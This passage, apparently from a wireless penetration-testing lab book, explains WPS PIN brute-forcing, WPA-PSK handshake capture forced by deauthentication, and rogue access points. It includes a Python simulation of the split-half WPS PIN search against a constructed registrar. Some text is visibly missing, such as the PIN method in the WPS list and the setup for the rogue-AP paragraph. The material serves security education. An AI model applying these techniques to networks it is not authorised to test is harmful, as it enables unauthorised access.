exchange mechanism which plays an important role in establishing connections
between devices and access points. It was developed to make the process of
connecting a device to an access point easier, but it turned out to be one of the
biggest holes in modern WLANs if activated.
WPS works with WPA/WPA2-PSK and allows devices to connect to WLANs with
one of the following methods:
Push button: Special buttons are pushed on both the access point and the
client device during the connection phase. The buttons can be physical
or virtual.
NFC: A client should bring a device close to an access point to utilize the
Near Field Communication technology.
Because a WPS PIN is only eight digits, of which the last is a checksum, and because
the access point validates its first and second halves separately, an online
brute-force attack on the PIN needs at most around 11,000 attempts and can be
completed in several hours, allowing an attacker to obtain the WLAN key and connect.
Furthermore, an offline PIN cracking technique was published in 2014; it recovers
the PIN in 1 to 30 seconds, but it works only on certain devices whose WPS
implementation uses weak random values.
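The following example is added here and is not code from the book. It shows why the split validation makes an online attack practical: it computes the WPS PIN checksum digit, simulates a registrar that rejects a wrong first half at message M4 and a wrong second half at M6 (the protocol behaviour behind the attack), and counts how many attempts the split search needs compared with the 10,000,000 that a naive search of all eight-digit PINs would need. The secret PIN and the registrar are constructed for the example; real access points add lockouts and rate limiting that the simulation does not model.

```python
def wps_checksum(first7):
    """Check digit appended to the first seven digits of a WPS PIN
    (digit weights 3,1,3,1,3,1,3 from left to right)."""
    digits = [int(c) for c in f"{first7:07d}"]
    total = sum(d * (3 if i % 2 == 0 else 1) for i, d in enumerate(digits))
    return (10 - total % 10) % 10


def valid_pin(pin8):
    """True if the eight-digit PIN carries a correct checksum digit."""
    return (len(pin8) == 8 and pin8.isdigit()
            and int(pin8[7]) == wps_checksum(int(pin8[:7])))


class Registrar:
    """Simulated access point. The flaw: the reply to M4 already reveals
    whether the first four digits were right, and the reply to M6 whether
    the last four were, so the halves can be searched independently."""

    def __init__(self, pin):
        assert valid_pin(pin)
        self.pin = pin
        self.attempts = 0

    def try_pin(self, pin8):
        self.attempts += 1
        if pin8[:4] != self.pin[:4]:
            return "NACK at M4"
        if pin8[4:] != self.pin[4:]:
            return "NACK at M6"
        return "M7: network key delivered"


def split_bruteforce(ap):
    """Recover the PIN in at most 10^4 + 10^3 = 11,000 attempts: search the
    first half until M4 passes, then the three free digits of the second
    half, computing the checksum digit instead of guessing it."""
    first = next(f"{i:04d}" for i in range(10_000)
                 if ap.try_pin(f"{i:04d}0000") != "NACK at M4")
    for j in range(1_000):
        second = f"{j:03d}"
        pin = first + second + str(wps_checksum(int(first + second)))
        if ap.try_pin(pin).startswith("M7"):
            return pin
    return None


# Constructed secret PIN for the demo (the last digit is its checksum).
SECRET_PIN = "98765430"


def demo():
    ap = Registrar(SECRET_PIN)
    return split_bruteforce(ap), ap.attempts


if __name__ == "__main__":
    pin, attempts = demo()
    print(f"recovered {pin} after {attempts} attempts (naive search: up to 10,000,000)")
```

On a real target the same logic is what tools that attack WPS PINs implement, with delays and retries added to cope with access points that lock WPS after a number of failures.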
You should also not forget that a person who is not permitted to connect to a WLAN
but who can physically access a Wi-Fi router or access point can also read and use a
PIN or connect via the push button method.
WPA-PSK attacks
As both WPA and WPA2 are based on the 4-way handshake, attacking them does not
differ: an attacker needs to sniff a 4-way handshake at the moment a connection is
established between an access point and any wireless client and then brute force the
matching PSK offline. It does not matter whose handshake is intercepted, because all
clients use the same PSK for a given target WLAN.
Sometimes, attackers have to wait a long time until a device connects to a WLAN to
intercept a 4-way handshake, and of course they would like to speed up the process
when possible. For that purpose, they force an already connected device to disconnect
from the access point by sending deauthentication management frames (a
deauthentication attack) with a spoofed source address on behalf of the target
access point. When a device receives such a frame, it disconnects from the WLAN and
tries to reconnect if the "automatic reconnect" feature is enabled (it is enabled by
default on most devices), thus performing another 4-way handshake that can be
intercepted by the attacker.
Another possibility to hack a WPA-PSK protected network is to crack a WPS PIN if
WPS is enabled on a target WLAN.
From the user's perspective, being attacked in this way looks like being unable to
connect to a WLAN for an unknown reason, and it may go unnoticed entirely if the user
is not using the device at that moment and is just passing by the rogue access point.
It is worth mentioning that classic physical security and wireless IDPS solutions are
not always effective in such cases. An attacker or a penetration tester can install a
rogue access point outside the range of the target WLAN. This allows them to attack
user devices without entering a physically controlled area (for example, an office
building), making the rogue access point unreachable and invisible to wireless IDPS
systems. Such a place could be a bus or train station, a parking lot, or a café
where many users of the target WLAN go with their Wi-Fi devices.
Unlike WPA-PSK, with only one key shared between all WLAN users, the Enterprise
mode gives each user individual credentials, whose complexity depends on the
particular user. That is why it is better to collect as many user credentials and
authentication hashes as possible, thus increasing the chances of successful cracking.
Summary
In this chapter, we reviewed which wireless technologies are used to transfer data
and especially highlighted the Wi-Fi technology as the technology that we will
employ to provide network access to our penetration testing lab.
During our journey through this chapter, we also looked at the security mechanisms
that are used to secure access to wireless networks, their typical threats, and
common misconfigurations that lead to security breaches and allow attackers to
harm corporate and private wireless networks.
The brief attack methodology overview has given us a general understanding of
how attackers normally act during wireless attacks and how they bypass common
security mechanisms by exploiting certain flaws in those mechanisms.
We also saw that the most secure and preferable way to protect a wireless
network is to use WPA2-Enterprise security along with a mutual client and server
authentication, which we are going to implement in our penetration testing lab.
Now, we are ready to proceed with building a wireless lab protected from the flaws
listed previously. In the next chapter, we are going to help you to first determine the
tasks that a lab should fulfill for you and then we will guide you through the whole
lab planning process. The guidance is organized in such a way that you can decide
which lab components and technologies you need to implement based on your
own requirements.